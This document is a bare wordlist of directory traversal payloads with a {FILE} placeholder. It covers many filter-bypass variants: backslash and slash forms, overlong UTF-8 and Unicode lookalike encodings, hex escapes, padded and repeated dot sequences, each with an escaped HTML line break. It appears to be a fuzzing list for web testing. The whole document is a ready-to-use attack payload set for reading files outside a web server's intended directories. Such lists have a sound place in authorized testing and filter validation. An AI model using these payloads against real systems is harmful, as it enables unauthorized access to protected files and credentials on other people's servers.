AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.../{FILE}&lt;br /&gt;
.../.../{FILE}&lt;br /&gt;
.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../.../.../{FILE}&lt;br /&gt;
...\{FILE}&lt;br /&gt;
...\...\{FILE}&lt;br /&gt;
...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\...\...\{FILE}&lt;br /&gt;
..../{FILE}&lt;br /&gt;
..../..../{FILE}&lt;br /&gt;
..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../..../..../{FILE}&lt;br /&gt;
....\{FILE}&lt;br /&gt;
....\....\{FILE}&lt;br /&gt;
....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\....\....\{FILE}&lt;br /&gt;
........................................................................../{FILE}&lt;br /&gt;
........................................................................../../{FILE}&lt;br /&gt;
........................................................................../../../{FILE}&lt;br /&gt;
........................................................................../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../../../{FILE}&lt;br /&gt;
..........................................................................\{FILE}&lt;br /&gt;
..........................................................................\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
///%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
\\\%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..//{FILE}&lt;br /&gt;
..//..//{FILE}&lt;br /&gt;
..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
..///..///{FILE}&lt;br /&gt;
..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..\\{FILE}&lt;br /&gt;
..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
./\/./{FILE}&lt;br /&gt;
./\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}&lt;br /&gt;
